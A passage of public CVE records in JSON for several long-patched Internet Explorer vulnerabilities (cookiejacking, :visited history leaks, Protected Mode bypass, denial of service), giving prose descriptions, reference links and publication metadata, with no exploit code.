"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-1545",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://pwn2own.zerodayinitiative.com/status.html",
"refsource": "MISC",
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"name": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars",
"refsource": "MISC",
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"name": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621",
"refsource": "MISC",
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"name": "http://twitter.com/vupen/statuses/177895844828291073",
"refsource": "MISC",
"url": "http://twitter.com/vupen/statuses/177895844828291073"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-1545",
"datePublished": "2012-03-09T11:00:00Z",
"dateReserved": "2012-03-09T00:00:00Z",
"dateUpdated": "2024-09-17T02:01:01.177Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-5071 (GCVE-0-2010-5071)
Vulnerability from cvelistv5 – Published: 2011-12-07 19:00 – Updated: 2024-09-16 23:31
VLAI?
Summary
The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T04:09:38.985Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-12-07T19:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-5071",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://w2spconf.com/2010/papers/p26.pdf",
"refsource": "MISC",
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-5071",
"datePublished": "2011-12-07T19:00:00Z",
"dateReserved": "2011-12-07T00:00:00Z",
"dateUpdated": "2024-09-16T23:31:42.872Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2002-2435 (GCVE-0-2002-2435)
Vulnerability from cvelistv5 – Published: 2011-12-07 19:00 – Updated: 2024-08-08 04:06
VLAI?
Summary
The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T04:06:54.637Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2002-06-10T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2002-2435",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://w2spconf.com/2010/papers/p26.pdf",
"refsource": "MISC",
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"name": "ms-ie-css-info-disc(71817)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/71817"
},
{
"name": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777",
"refsource": "MISC",
"url": "http://bugzilla.mozilla.org/show_bug.cgi?id=147777"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2002-2435",
"datePublished": "2011-12-07T19:00:00",
"dateReserved": "2011-12-07T00:00:00",
"dateUpdated": "2024-08-08T04:06:54.637Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-2383 (GCVE-0-2011-2383)
Vulnerability from cvelistv5 – Published: 2011-06-03 17:00 – Updated: 2024-08-06 23:00
VLAI?
Summary
Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue, aka "Drag and Drop Information Disclosure Vulnerability." NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T23:00:33.783Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"tags": [
"vendor-advisory",
"x_refsource_MS",
"x_transferred"
],
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL",
"x_transferred"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2011-05-20T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-12T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"tags": [
"vendor-advisory",
"x_refsource_MS"
],
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"tags": [
"vdb-entry",
"signature",
"x_refsource_OVAL"
],
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-2383",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 9 and earlier does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing an http: URL that redirects to a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue, aka \"Drag and Drop Information Disclosure Vulnerability.\" NOTE: this vulnerability exists because of an incomplete fix in the Internet Explorer 9 release."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.informationweek.com/news/security/vulnerabilities/229700031",
"refsource": "MISC",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "MS11-057",
"refsource": "MS",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-057"
},
{
"name": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388",
"refsource": "MISC",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"name": "http://news.cnet.com/8301-1009_3-20066419-83.html",
"refsource": "MISC",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"name": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/",
"refsource": "MISC",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"name": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/",
"refsource": "MISC",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "oval:org.mitre.oval:def:12820",
"refsource": "OVAL",
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12820"
},
{
"name": "http://www.youtube.com/watch?v=VsSkcnIFCxM",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"name": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt",
"refsource": "MISC",
"url": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt"
},
{
"name": "http://www.networkworld.com/community/node/74259",
"refsource": "MISC",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"name": "http://www.youtube.com/watch?v=V95CX-3JpK0",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"name": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt",
"refsource": "MISC",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-2383",
"datePublished": "2011-06-03T17:00:00",
"dateReserved": "2011-06-03T00:00:00",
"dateUpdated": "2024-08-06T23:00:33.783Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2011-2382 (GCVE-0-2011-2382)
Vulnerability from cvelistv5 – Published: 2011-06-03 17:00 – Updated: 2024-09-17 02:41
VLAI?
Summary
Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a "cookiejacking" issue.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T23:00:33.554Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2011-06-03T17:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://ju12.tistory.com/attachment/cfile4.uf%40151FAB4C4DDC9E0002A6FE.ppt"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.networkworld.com/community/node/74259"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2011-2382",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 8 and earlier, and Internet Explorer 9 beta, does not properly restrict cross-zone drag-and-drop actions, which allows user-assisted remote attackers to read cookie files via vectors involving an IFRAME element with a SRC attribute containing a file: URL, as demonstrated by a Facebook game, related to a \"cookiejacking\" issue."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://www.informationweek.com/news/security/vulnerabilities/229700031",
"refsource": "MISC",
"url": "http://www.informationweek.com/news/security/vulnerabilities/229700031"
},
{
"name": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388",
"refsource": "MISC",
"url": "http://conference.hackinthebox.org/hitbsecconf2011ams/?page_id=1388"
},
{
"name": "http://news.cnet.com/8301-1009_3-20066419-83.html",
"refsource": "MISC",
"url": "http://news.cnet.com/8301-1009_3-20066419-83.html"
},
{
"name": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/",
"refsource": "MISC",
"url": "http://www.eweek.com/c/a/Security/IE-Flaw-Lets-Attackers-Steal-Cookies-Access-User-Accounts-402503/"
},
{
"name": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/",
"refsource": "MISC",
"url": "http://www.theregister.co.uk/2011/05/25/microsoft_internet_explorer_cookiejacking/"
},
{
"name": "http://www.youtube.com/watch?v=VsSkcnIFCxM",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=VsSkcnIFCxM"
},
{
"name": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt",
"refsource": "MISC",
"url": "http://ju12.tistory.com/attachment/cfile4.uf@151FAB4C4DDC9E0002A6FE.ppt"
},
{
"name": "http://www.networkworld.com/community/node/74259",
"refsource": "MISC",
"url": "http://www.networkworld.com/community/node/74259"
},
{
"name": "http://www.youtube.com/watch?v=V95CX-3JpK0",
"refsource": "MISC",
"url": "http://www.youtube.com/watch?v=V95CX-3JpK0"
},
{
"name": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt",
"refsource": "MISC",
"url": "https://sites.google.com/site/tentacoloviola/cookiejacking/Cookiejacking2011_final.ppt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2011-2382",
"datePublished": "2011-06-03T17:00:00Z",
"dateReserved": "2011-06-03T00:00:00Z",
"dateUpdated": "2024-09-17T02:41:25.100Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-2118 (GCVE-0-2010-2118)
Vulnerability from cvelistv5 – Published: 2010-06-01 20:00 – Updated: 2024-08-07 02:25
VLAI?
Summary
Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T02:25:06.342Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-05-27T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-2118",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Microsoft Internet Explorer 6.0.2900.2180 and 8.0.7600.16385 allows remote attackers to cause a denial of service (resource consumption) via JavaScript code containing an infinite loop that creates IFRAME elements for invalid news:// URIs."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://websecurity.com.ua/4238/",
"refsource": "MISC",
"url": "http://websecurity.com.ua/4238/"
},
{
"name": "20100528 [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/511509/100/0/threaded"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-2118",
"datePublished": "2010-06-01T20:00:00",
"dateReserved": "2010-06-01T00:00:00",
"dateUpdated": "2024-08-07T02:25:06.342Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2010-1991 (GCVE-0-2010-1991)
Vulnerability from cvelistv5 – Published: 2010-05-20 17:00 – Updated: 2024-08-07 02:17
VLAI?
Summary
Microsoft Internet Explorer 6.0.2900.2180, 7, and 8.0.7600.16385 executes a mail application in situations where an IFRAME element has a mailto: URL in its SRC attribute, which allows remote attackers to cause a denial of service (excessive application launches) via an HTML document with many IFRAME elements.
Severity ?
No CVSS data available.
CWE
- n/a
Assigner
References
| URL | Tags | |||||||
